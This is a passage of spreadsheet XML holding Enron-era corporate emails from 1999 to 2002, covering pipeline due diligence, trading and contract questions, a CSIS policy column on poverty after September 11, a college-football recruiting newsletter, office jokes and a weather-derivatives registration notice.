into the class.  I will check for voice messages during  breaks.  If, for _x000D_
some reason, my voice mail does not successfully survive the move, you can _x000D_
try me on my cell phone (713-594-2683).  It will be turned off during the _x000D_
seminar but it receives voice messages, which I will check during breaks.</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 07:31:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Questar Southern Trails Due Diligence</t>
  </si>
  <si>
    <t>In the next few days.  We'll call you and let you know when we start the process so we can get your imput._x000D_
_x000D_
Mark_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Wednesday, October 17, 2001 7:14 AM_x000D_
To:	McConnell, Mark_x000D_
Cc:	Watson, Kimberly; Harris, Steven_x000D_
Subject:	RE: Questar Southern Trails Due Diligence_x000D_
_x000D_
When will we be creating the due diligence team?	_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McConnell, Mark  _x000D_
Sent:	Tuesday, October 16, 2001 3:50 PM_x000D_
To:	Geaccone, Tracy; Hayslett, Rod; Huber, Lee; Kilmer III, Robert; Lokey, Teb; Centilli, James; Abdmoulaie, Mansoor; Gadd, Eric_x000D_
Cc:	Harris, Steven; Watson, Kimberly_x000D_
Subject:	Questar Southern Trails Due Diligence_x000D_
_x000D_
_x000D_
The LOI with a nonbinding bid referencing our interest in their West Leg of the Southern Trail Pipeline was faxed to Questar yesterday .  We are confident that we will be invited to the data room to perform due diligence.  We anticipate that this will occur at the end of this month.  As soon as we know the exact date, we will advise all of those involved._x000D_
_x000D_
We will be assembling the due diligence team this week and then we will meet to create a plan for the process while we have access to the data room._x000D_
_x000D_
We'll be in touch as the details unfold.  In the mean time, if you have any questions, please feel free to call Kim Watson or myself._x000D_
_x000D_
Mark_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 05:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ENA-Cal</t>
  </si>
  <si>
    <t xml:space="preserve">These ARE a kind of desk-to-desk deal, but officially they are _x000D_
cross-portfolio deals, because they cross from the ENAEXEC to WEST portfolio. _x000D_
I'm not familiar with Unity, but let me check around here and see if anyone _x000D_
knows where these deals should be settled. Also let me know if the fact that _x000D_
they are cross-portfolio deals helps you at all. That's all I know right now._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
02/12/2001 01:22 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: ENA-Cal_x000D_
_x000D_
Do the deals booked here need to go to Unify to be settled?  Are they desk to _x000D_
desk?  Sorry to bug you but I'm assigning contract numbers._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 12:14:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rtunstall@csis.org'})</t>
  </si>
  <si>
    <t>CSIS Column on Treating the Causes of the Terrorist Attack</t>
  </si>
  <si>
    <t>This message contains the text of Sidney Weintraub's Issues in International Political Economy for the month of October. This month, Dr. Weintraub focuses on the argument that the treatment for the cause of the terrorist attacks lies in reducing poverty. To go directly to the web version, click on:_x000D_
_x000D_
http://www.csis.org/simonchair/issues200110.htm_x000D_
_x000D_
For further information, please contact Rebecca Tunstall at 202-775-3123._x000D_
_x000D_
_x000D_
ISSUES IN INTERNATIONAL POLITICAL ECONOMY_x000D_
October 2001, Number 22_x000D_
_x000D_
THE TERRORIST ATTACK: TREATING THE CAUSES_x000D_
Sidney Weintraub_x000D_
_x000D_
We have been hearing much since September 11 that the United States, to avoid future terrorist attacks, must treat the causes. Which causes? Should the treatment deal with reversing the terrorists' hatred for the United States, eliminating anti-Jewish sentiment, correcting the lack of freedom in most Middle-Eastern countries, refighting the Kosovo war and getting some Americans killed, making too many or too few charges against foreign human rights violations, eliminating homosexuality and civil liberties in the United States (as Jerry Falwell and Pat Robertson seem to believe), altering the capitalist system that prevails in the developed countries, changing the U.S. lifestyles that so infuriate Muslim zealots, reducing poverty?_x000D_
_x000D_
No shortage of "causes," some outrageous, others idiosyncratic, and some even with a sense of legitimacy, have been put forward that should be treated. The monthly commentaries in this issues series deal with political economy and I will stick (mostly) to the last and focus on poverty. However, this must be prefaced with a caveat. I find it impossible that anyone can seriously believe that because there is much poverty in the Middle East, terrorists who are not themselves poor concluded that the corrective was to attack the World Trade Center towers and the Pentagon and kill thousands of innocent people._x000D_
_x000D_
I am focusing on poverty because it is a global scourge and we would have a better world if poverty could be reduced drastically. One consequence of the events on September 11 will be to sharply increase poverty because of the ripple effects on developing countries from the economic troubles of the United States and other industrial countries. Markets for the goods and services of developing countries will shrink, as will investment in them. When the economies of rich countries decline, the suffering from the fallout is usually greater in poor countries. This, for better or worse, is part of globalism._x000D_
_x000D_
Many implicitly assume that the reduction of poverty has been neglected up until now. This is not true. What is correct, however, is that the world has not been overwhelmingly effective in dealing with the problem. The number of people who live below the poverty line is now about 1.3 billion. This is an enormous figure, even though the proportion of the world's population living in poverty has declined more in the past 50 years than in the previous 500 years. The absolute number, however, has risen._x000D_
_x000D_
Poverty is not an independent manifestation isolated from development strategies and politics within countries, but part and parcel of the bigger picture. I have not understood the motivations of the protesters who show up to disrupt meetings of international development and trade organizations because precisely these institutions have taken the lead to reduce poverty. Poverty did not begin with globalization. The proportion of people living in poverty has not increased because globalization has made communications and financial transfers more efficient than ever before. If anything, globalization is an opportunity to reduce levels of poverty because linkages between developed and developing countries are now so intense._x000D_
_x000D_
Poverty reduction clearly goes hand-in-hand with economic growth. Overall economic growth is insufficient to reduce poverty, but it is the essential ingredient. Redistribution without growth merely rearranges the scenery, but does not get at the core of the problem. Poverty-reduction policy, therefore, must be an ingredient of development policy. And that is the rub; no simple, sure-fire formula exists for converting a stagnant, low-income country into a vibrant one with a growing economy._x000D_
_x000D_
Development is a slow, slogging, arduous process that must deal with big-picture matters, such as macroeconomic policy, and microeconomic issues of industrial and agricultural development and the building of solid institutions. Education must be a priority, and this cannot be accomplished in one decade or one generation. Infant mortality is higher and life expectancy is lower in developing countries because of inadequate health care. Countries need roads to bring goods to market, equity in land tenure, ports, an adequate and safe water supply, and the infrastructure that makes development possible. Poverty reduction, if all of these needs are met, must then be a conscious part of government programs, which is why bumper-sticker slogans like "Reduce Poverty" are fatuous. By all means, let us work to reduce poverty, but the issue must be treated more seriously than a politician's or an editorialist's spin might suggest._x000D_
_x000D_
The history of today's developed countries, as widely documented, is that poverty actually increased during the early years of the development process. Investments during the early days of the growth process tended to direct resources to immediately productive activities and only after the cumulative effects of these development accomplishments reached a pivotal point did poverty and inequality decline. Thus one may make a case for directing more resources to developing countries, but they must be part of a viable development program. And, yes, the United States has not in recent years been a generous aid donor in relation to the U.S. gross domestic product. Politicians say that foreign aid is not popular because it helps foreigners. Yes, it does, but what is wrong with that?_x000D_
_x000D_
The discussion of poverty reduction can be brought specifically to the situation in the Middle East and South Asia. Most people in those regions, which seem to be the cradle of the terrorism movement, live in poverty. Not a single country in the Middle East, save Israel, has a democratic government. Population growth rates are high and this adds to the costs of development. Yet, the priorities of dictatorial leaders, whether religious or otherwise, are not economics-or reducing poverty-but a host of other issues, from religious fanaticism to political dominance to a hatred of neighbors._x000D_
_x000D_
Is this situation mainly the fault of the United States? Does the existence of Israel impoverish its Arab enemies? The answer to both questions is, of course, no. Has the United States made errors in the ways it has interacted with countries in the Middle East? Has Israel? Yes, both countries have. But to then leap from this to the assertion that the attacks were justified, that the United States got what it deserved, is insane. Has the United States provided benefits and favors to countries in the Middle East? The answer is surely yes, more so than any other country._x000D_
_x000D_
Countries make their own development policies. Unless a country makes a development policy its own, the reality that aid will accomplish little has long been a truism among development-assistance practitioners. Donor countries and agencies can give advice and provide technical and financial resources, but they cannot impose programs that national leaders do not want, a lesson that has been learned repeatedly. Aid donors cannot eliminate corruption; leaders of countries must do that. The donors cannot insist that dictatorial regimes be transformed into democracies; they can withhold aid or they can grant it and hope that some start at development will lead to more satisfactory regimes. If economic development and the installation of democracy are unimportant in the agendas of foreign leaders, neither the United States nor other donors have much power to alter the situation._x000D_
_x000D_
To return to where this commentary began, poverty is a deep-seated plague, one that the world must deal with on moral and practical grounds. However, it is impossible to will away poverty; this takes consistent dedication. Poverty has been reduced sharply in some countries because their leaders and priorities of governance sincerely sought economic growth and poverty reduction. The number of poor has been reduced as a proportion of world population because of the economic system put into effect after World War II. However, the job is far from accomplished and deserves a sustained effort to do better in the future._x000D_
_x000D_
Issues in International Political Economy is produced by the William E. Simon Chair in Political Economy at the Center for Strategic and International Studies (CSIS), a private, tax-exempt institution focusing on international public policy issues. Its research is nonpartisan and nonproprietary._x000D_
_x000D_
CSIS does not take specific policy positions. Accordingly, all views, positions, and conclusions expressed in this publication should be understood to be solely those of the author._x000D_
_x000D_
? 2001 by the Center for Strategic and International Studies.</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 01:10:12 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">This request has been pending your approval for  137 days.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000041547&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000041547_x000D_
Request Create Date : 6/19/01 7:50:30 AM_x000D_
Requested For       : jaime.gualy@enron.com_x000D_
Resource Name       : \\nahoutrd\houston\pwr\common\power2\Region - [Read]_x000D_
Resource Type       : Directory_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 01:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eric.bass@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>Another slam on Gore!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Brian T. Hoskins_x000D_
Enron Broadband Services_x000D_
713-853-0380 (office)_x000D_
713-412-3667 (mobile)_x000D_
713-646-5745 (fax)_x000D_
Brian_Hoskins@enron.net_x000D_
_x000D_
_x000D_
----- Forwarded by Brian Hoskins/Enron Communications on 11/15/00 09:40 AM _x000D_
-----_x000D_
_x000D_
	Kori Loibl@ECT_x000D_
	11/14/00 04:03 PM_x000D_
		 _x000D_
		 To: Alicia Perkins/HOU/EES@EES, Purvi Patel/HOU/ECT@ECT, Beau _x000D_
Ratliff/HOU/EES@EES, Lucy Ortiz/HOU/ECT@ECT, Scott Pleus/Enron _x000D_
Communications@Enron Communications, Don Baughman/HOU/ECT@ECT, Brian _x000D_
Hoskins/Enron Communications@Enron Communications, Tobin Carlson/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Another slam on Gore!_x000D_
_x000D_
This is great!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Eric's B-Day</t>
  </si>
  <si>
    <t xml:space="preserve">shanna can't make it, matt and hull won't show,  you can invite luis though_x000D_
_x000D_
_x000D_
   Hector Campos                01/23/2001 10:37 AM_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Eric's B-Day_x000D_
_x000D_
_x000D_
Let's see if any of these people can make it tonight..._x000D_
_x000D_
---------------------- Forwarded by Hector Campos/HOU/ECT on 01/23/2001 10:37 _x000D_
AM ---------------------------_x000D_
   Hector Campos                01/23/2001 10:37 AM_x000D_
_x000D_
To: Shanna Husser/HOU/EES@EES, Matthew Lenhart/HOU/ECT@ECT, Luis _x000D_
Mena/NA/Enron@Enron, Bryan Hull/HOU/ECT@ECT, Christa Winfrey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Eric's B-Day_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Hector Campos/HOU/ECT on 01/23/2001 10:33 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Brian Hoskins@ENRON COMMUNICATIONS_x000D_
01/23/2001 10:23 AM_x000D_
To: Lenine Jeganathan/HOU/ECT@ECT, Hector Campos/HOU/ECT@ECT_x000D_
cc: Eric Bass/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
6:30 @ Lupe's tonight for the Big Guy's birthday.  Happy 21st, Eric!  ;-)_x000D_
_x000D_
______________________x000D_
Brian T. Hoskins_x000D_
Enron Broadband Services_x000D_
713-853-0380 (office)_x000D_
713-412-3667 (mobile)_x000D_
713-646-5745 (fax)_x000D_
Brian_Hoskins@enron.net_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 13:01:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'serena.bishop@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com'})</t>
  </si>
  <si>
    <t>CNC Containers Termination</t>
  </si>
  <si>
    <t>Gang:_x000D_
_x000D_
We have received a termination letter from CNC Containers for our California business.  Steve Hall has a copy.  Please stop scheduling for them ASAP._x000D_
_x000D_
Thanks_x000D_
_x000D_
C</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'george.smith@enron.com', 'robert.superty@enron.com', 'carrie.slagle@enron.com', 'susan.harrison@enron.com'})</t>
  </si>
  <si>
    <t>Contract Exchange</t>
  </si>
  <si>
    <t>I think we are on the right track from our meeting yesterday.  I talked to _x000D_
Patti today and she is confirming the way we want to do things from a users _x000D_
perspective.  My thought is that we get a good, general, working model as to _x000D_
how the information will flow, then take it back to our groups and go over _x000D_
different scenarios within each region, such as Opal Plant, Socal, etc.  We _x000D_
can see how the information will flow and see what we need to tinker with._x000D_
_x000D_
I also have a few questions we need to think about at some point, and I did _x000D_
not want to forget them.  _x000D_
_x000D_
1.  When we make a change to an existing upstream/downstream contract, how _x000D_
will we notify the counterparties that a change has occurred.  _x000D_
_x000D_
2.  Should we lock out our customer's at some time so they can't make changes _x000D_
at a late time?  We could do the rest over the phone._x000D_
_x000D_
3.  On EDI pipes, we could conceivably make changes up to 11:45 am, but it _x000D_
would affect customers whose noms are due at 11:30.  _x000D_
_x000D_
I thought these were just questions we might want to think about.  I'm sure _x000D_
there are a lot of others._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 10:19:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dgagliardi@reliant.com'})</t>
  </si>
  <si>
    <t>Fw: True Orange E-Mail/Fax #56</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
----- Forwarded by David M Gagliardi/TTG/HouInd on 05/29/01 12:17 PM -----_x000D_
_x000D_
                    "Michael_x000D_
                    Gagliardi"           To:     &lt;dgagliardi@reliantenergy.com&gt;, david_ricks@gsdm.com,_x000D_
                    &lt;mikegag@msn.        tony.a.rogers@fritolay.com_x000D_
                    com&gt;                 cc:_x000D_
                                         Subject:     Fw: True Orange E-Mail/Fax #56_x000D_
                    05/29/01_x000D_
                    11:29 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 ----- Original Message -----_x000D_
 From: TruOrange@aol.com_x000D_
 Sent: Monday, May 28, 2001 8:19 PM_x000D_
 To: TruOrange@aol.com; judy.roach@bakerbotts.com_x000D_
 Subject: True Orange E-Mail/Fax #56_x000D_
_x000D_
 True Orange E-Mail/Fax Service_x000D_
 Volume 9, Fax/E-Mail #56, Monday, May 28, 2001_x000D_
 Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
 Phone_x000D_
 512-795-8536_x000D_
_x000D_
 Earl Anderson Commits to Horns; Lyle Sendlein Poised to Come Aboard_x000D_
_x000D_
 Earl Anderson of San Marcos, the quickest big DT I've seen this year, says_x000D_
 he_x000D_
 has committed to Texas unofficially and will make it official Sunday when_x000D_
 he_x000D_
 comes to the Longhorns' first mini-camp._x000D_
 Lyle Sendlein of Scottsdale Chaparral, another big DT prospect who is so_x000D_
 fast_x000D_
 he plays middle linebacker at his school, told me he also plans to commit_x000D_
 at_x000D_
 Sunday's camp "if they offer me a  scholarship." Don't worry, Lyle, your_x000D_
 scholarship will be waiting for you._x000D_
 When Anderson and Sendlein commit officially on Sunday, it will give the_x000D_
 Longhorns the lead in early recruiting in the Big 12 and start them on the_x000D_
_x000D_
 way to a fourth straight top five national recruiting class._x000D_
 Anderson is the highest ranked Texas blue-chipper to pick a college. He is_x000D_
_x000D_
 No. 3 on my 25-man "difference-maker" list, and Texas also has a_x000D_
 commitment_x000D_
 from OL Bret Valdez of Brownwood, who is No. 23 on that list. Sendlein is_x000D_
 the_x000D_
 top recruit in Arizona and, if he lived in Texas, he would be high in my_x000D_
 top_x000D_
 25._x000D_
 Anderson, who says he has grown an inch to 6-4 and now weighs 275, told me_x000D_
_x000D_
 can still break 4.8 in the 40 on most days. "I ran a 4.78 the last time I_x000D_
 was_x000D_
 clocked," he said. "I want to stay below 4.8, so I'm watching my weight_x000D_
 now."_x000D_
 I was the first guy to give him a high ranking after seeing his incredible_x000D_
_x000D_
 quickness last season._x000D_
 He said he picked Texas over Texas A&amp;M, Florida State and others because_x000D_
 UT_x000D_
 "has the great combination of athletics and academics that I want and it's_x000D_
 so_x000D_
 close that my parents won't have to spend a lot of money traveling around_x000D_
 to_x000D_
 see me play."_x000D_
 Besides that, he said, "I've always been a Longhorn fan."_x000D_
 Sendlein comes from such a Longhorn family that his UT linebacker brother_x000D_
 is_x000D_
 named Austin. Their father, Robin, was a great linebacker at Texas and_x000D_
 also_x000D_
 played in the NFL for many years. He said he is 6-5, 275, and can run the_x000D_
 40_x000D_
 in 4.85. His Scottsdale team has gone 14-0 two straight years and his_x000D_
 prowess_x000D_
 as a defender is one of the main reasons for the team's success._x000D_
 Sendlein was being recruited by all the top schools in the Pac 10, plus_x000D_
 Notre_x000D_
 Dame, Nebraska, Michigan and Penn State._x000D_
 Coach Mack Brown said one of the Longhorns' top recruiting goals this year_x000D_
_x000D_
 was to sign several top defensive linemen, and, while he can't comment on_x000D_
 individual recruits,  Anderson and Sendlein are top-notch defensive line_x000D_
 prospects._x000D_
 Another great defensive line prospect, Chase Pittman of Shreveport_x000D_
 Evangel,_x000D_
 came in at 6-4 1/2 and 261 and ran a 4.8 40 at a Nike camp at LSU_x000D_
 recently,_x000D_
 and he also bench pressed 185 pounds 36 times. No one else at the camp was_x000D_
_x000D_
 able to bench press 185 pounds more than 22 times. Pittman bench pressed_x000D_
 440_x000D_
 pounds, a tremendous achievement for a high school junior, at a recent_x000D_
 charity fund raising event at Evangel._x000D_
 He is the younger brother of Cole Pittman, the former UT defensive linemen_x000D_
_x000D_
 who was killed in a tragic auto accident earlier this year while returning_x000D_
 to_x000D_
 Texas for spring training. He is considering Texas, LSU and Oklahoma._x000D_
 CB Donald Burgs of Houston Madison plans to come to the second UT_x000D_
 mini-camp_x000D_
 on June 10, and there is a good chance he will commit to the Longhorns. He_x000D_
 is_x000D_
 a big Texas fan who is No. 15 on my "difference-maker" list._x000D_
 * * * *_x000D_
 FOOTBALL NOTES: A columnist for the Sporting News has picked Texas No. 1._x000D_
 I_x000D_
 like his sentiments and I think the Longhorns will be one of the nation's_x000D_
 elite teams this season, but it's tough to go all the way when you have to_x000D_
_x000D_
 win your division of the Big 12, beat a team like Nebraska or Kansas State_x000D_
 in_x000D_
 the league championship game and then tame someone like Florida State or_x000D_
 Miami in the Rose Bowl. Texas could do it, but so could several other_x000D_
 teams._x000D_
 Darrell Royal won three national titles at Texas, but I always thought his_x000D_
_x000D_
 1964 team might have been his best one. Bear Bryant probably thought so,_x000D_
 too,_x000D_
 because it beat his national championship Alabama team and Joe Namath in_x000D_
 the_x000D_
 Orange Bowl, but a one-point loss at Arkansas kept the Horns from_x000D_
 repeating_x000D_
 as national champs. The point of that flashback is that a team can be_x000D_
 very, v_x000D_
 ery good and still not win the national title._x000D_
 * * * *_x000D_
 My next e-mail/fax will be whenever events warrant._x000D_
 * * * *_x000D_
 The True Orange E-Mail/Fax Service includes  at  least  99 fax/e-mails  a_x000D_
 year and costs $99 ($79 by E-Mail). The True Orange Newsletter includes_x000D_
 26_x000D_
 newsletters and is published weekly during football season and twice_x000D_
 monthly_x000D_
 during most of the other months. It costs $45. Save by subscribing to both_x000D_
_x000D_
 for $130 (or $110 if you take the faxes via E-Mail  or $99 if you take the_x000D_
_x000D_
 faxes and newsletter  via E-Mail). Send check  to address at the top of_x000D_
 page._x000D_
 I also  update my 900 number ? 1-900-288-8839 ? frequently with recruiting_x000D_
_x000D_
 news. My E-Mail address is: truorange@aol.com_x000D_
_x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 03:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>New Power People</t>
  </si>
  <si>
    <t>Could I get the following people added as contacts for The New Power Company_x000D_
_x000D_
Tim Ray_x000D_
Jeffery Porter_x000D_
David Scott_x000D_
 Mike Garred_x000D_
_x000D_
_x000D_
You are wonderfull.</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 08:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'eric.bass@enron.com', 'shanna.husser@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Cajun Humor</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
&gt;  Boudreaux and Thibodeaux were talking one afternoon, and Boudreaux_x000D_
&gt;tells_x000D_
&gt;  Thibodeaux, "You know, I tink I'm ready for a lil vacation. But, dis_x000D_
&gt;year_x000D_
&gt;  I wants to do sumting different. De-las' few year, I took your_x000D_
&gt;suggestion_x000D_
&gt;  bout where to go._x000D_
&gt;  Tree year ago you say I should go to Hawaii, an' did an' Marie got_x000D_
&gt;  pregnant._x000D_
&gt;  De next year you say to go to de Bahamas. Marie got pregnant agin. And_x000D_
&gt;las_x000D_
&gt;  year you tol me to go to Tahiti. Sure enough, Marie got pregnant_x000D_
&gt;again."_x000D_
&gt;  And Thibodeaux asks Boudreau, "What you gonna do dis year dat's_x000D_
&gt;  different?"_x000D_
&gt;   Boudreau says, "Dis year I gonna bring Marie wid me..."_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Tue, 29 Jun 1999 03:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Agency</t>
  </si>
  <si>
    <t xml:space="preserve">Elizabeth and I are coordinating on this matter. We commissioned the outside _x000D_
counsel advice together. Now that I'm back I'll get with her and see if we _x000D_
can reach some conclusions on these issues. Please feel free to call me if _x000D_
you wish to discuss further._x000D_
_x000D_
Elizabeth: I received a call from Leslie Hansen on this yesterday. I'll call _x000D_
her this week to discuss._x000D_
_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tanya Rohauer_x000D_
06/24/99 03:09 PM_x000D_
To: Alan B Aronowitz/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Agency_x000D_
_x000D_
Alan,_x000D_
_x000D_
I am currently compiling a list of those utilities that to our knowledge have _x000D_
agents. I am also trying to round up all of the agency agreements from our _x000D_
files. In light of outside counsel's comments regarding the ability of an _x000D_
agent to bind more than one principal, I am quite concerned over the amount _x000D_
of business we do this way.  I would be interested in reading whatever you _x000D_
received from outside counsel.  Also, are you coordinating this with _x000D_
Elizabeth Sager?  Tracy Ngo , who works in our group, told me Elizabeth has _x000D_
outside counsel looking at this too ( she is working here part time?) and _x000D_
they are fairly comfortable with how these documents work for power. In _x000D_
addition, where do the FERC and SEC fit into the picture?  Tracy mentioned _x000D_
something about required approvals.  I am trying to determine our exposure to _x000D_
these contracts, and whether they truly place our credit risk with the _x000D_
utilities._x000D_
_x000D_
Thanks,_x000D_
Tanya_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 15:47:19 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gsalazar@bcck.com'})</t>
  </si>
  <si>
    <t>Operating Agreement for BWGP</t>
  </si>
  <si>
    <t xml:space="preserve">Gloria,_x000D_
_x000D_
Here is the red-lined version of the proposed operating agreement._x000D_
_x000D_
Ken_x000D_
_x000D_
_x000D_
              _x000D_
           _x000D_
 - BWGP Op Agreement 11-01 rev.doc </t>
  </si>
  <si>
    <t>Wed, 30 May 2001 12:44:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gualy@enron.com'})</t>
  </si>
  <si>
    <t>Rice Energy derivatives class book/notes</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
As per our short conversation a while ago, I would like to see if I could get a copy of the material you used for your Energy Derivatives Class at Rice this Spring.  Please let me know if it is still ok to get a copy of these._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jaime E. Gualy_x000D_
EGM-Financial Trading_x000D_
3-0521</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 07:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jlmarques@aol.com'})</t>
  </si>
  <si>
    <t>Re: Bunko</t>
  </si>
  <si>
    <t>i should be there - barring any unexpected events of course...</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 02:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: DynegyDirect Product Approvals</t>
  </si>
  <si>
    <t xml:space="preserve">Leslie_x000D_
 _x000D_
Dynergy have accepted that the contract that they have prepared for Natural _x000D_
Gas Liquids is in effect an interruptible contract although it is not _x000D_
described as such and that this needs to be re-visited._x000D_
 _x000D_
I will be sending further comments today which will attempt to move the _x000D_
contract closer towards what we would like to see in our contracts._x000D_
 _x000D_
Kind regards_x000D_
 _x000D_
Marcus_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Leslie Hansen@ECT_x000D_
12/22/2000 11:28 AM_x000D_
To: Brent Hendry/NA/Enron@Enron, Dan J Hyvl/HOU/ECT@ECT, Marcus _x000D_
Nettelton/NA/Enron@ENRON_x000D_
cc: Sheri Thomas/HOU/ECT@ECT _x000D_
_x000D_
Subject: DynegyDirect Product Approvals_x000D_
_x000D_
Please notify both me and Sheri Thomas via e-mail as soon as you are _x000D_
comfortable with the product descriptions for your respective commodities on _x000D_
Dynegydirect so that Sheri can set up the respective traders to trade via _x000D_
DynegyDirect.  Sheri has been receiving calls from traders anxious to use the _x000D_
system._x000D_
_x000D_
Thank you so much.  Have a happy holiday._x000D_
_x000D_
Leslie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your ELRiX Registration</t>
  </si>
  <si>
    <t xml:space="preserve">Sara, long time no see.  I won't be over for this autumn's ECT conference but _x000D_
hope to be around next year.  _x000D_
_x000D_
Please do me a favour and look through the doc attached below, which is _x000D_
governed by New York law (in particular the reps under Section 2(d) and the _x000D_
governing law language/jurisdiction language).  The contract gives rise to _x000D_
some issues (e.g. deficient default language), which I thought I could _x000D_
address myself.  The matter is somewhat urgent.  Tks._x000D_
_x000D_
Martin_x000D_
_x000D_
_x000D_
_x000D_
Dear Mrs. Woolgar_x000D_
_x000D_
We would like to confirm that your company has successfully registered as a_x000D_
member of ELRiX Weather Derivatives._x000D_
_x000D_
Upon receipt by Swiss Re Financial Products (?SRFP?) of the documents_x000D_
listed hereinafter your company?s account on ELRiX will be activated:_x000D_
_x000D_
   Two copies of the attached Weather Derivatives Master Agreement bearing_x000D_
   the signature(s) of the person(s) authorized to sign on behalf of your_x000D_
   company._x000D_
   A US tax form duly filled as according to section 2 g) to i) of the_x000D_
   Weather Derivatives Master Agreement. You may find these forms and the_x000D_
   instructions pertaining thereto on the freely accessible website of the_x000D_
   Internal Revenue Service (http://www.irs.gov/forms_pubs/forms.html or_x000D_
   http://www.irs.gov/forms_pubs/fillin.html [fill-in-forms only]) by_x000D_
   clicking on the appropriate file from the list provided on the bottom of_x000D_
   the website._x000D_
   A customary document indicating who are the persons authorized to sign_x000D_
   on behalf of your company as well as an excerpt of your company's_x000D_
   signatures book or such other customary documentation acceptable to SRFP_x000D_
   (such as a list of authorized persons with signatory samples) evidencing_x000D_
   the authority and genuineness of the signatures of such persons_x000D_
    A certificate of incumbency specifying the names and signatures of_x000D_
   persons authorized to execute the Master Agreement and Confirmations on_x000D_
   behalf of the counterparty, and a certified copy of resoutions of the_x000D_
   Board of Directors authorizing the counterparty to enter into weather_x000D_
   derivatives transactions._x000D_
   A legal opinion issued by your legal counsel stating the authority of_x000D_
   your company to enter into the contemplated derivative agreement._x000D_
_x000D_
(See attached file: wd_Master_agreement.pdf)_x000D_
_x000D_
We kindly ask you to send these documents to the following address:_x000D_
_x000D_
Swiss Re Financial Products Corporation_x000D_
Attention: Clare Power_x000D_
55 East 52nd Street_x000D_
New York, NY 10055 USA._x000D_
_x000D_
In the meantime, two letters will be mailed to you by regular surface mail,_x000D_
one containing a user ID and main password and the other enclosing a_x000D_
strike-list of single-use passwords. Upon activation of your account you_x000D_
will be able to access the restricted area of the ELRiX website with your_x000D_
user ID, your main password and the single-use password._x000D_
_x000D_
Should you have any questions please do not hesitate to call the ELRiX Help_x000D_
Desk on_x000D_
+ 800 35 74 92 66 or send an e-mail to Contact_ELRiX@Swissre.com._x000D_
_x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
ELRiX Operations_x000D_
 - wd_Master_agreement.pdf_x000D_
_x000D_
_x000D_
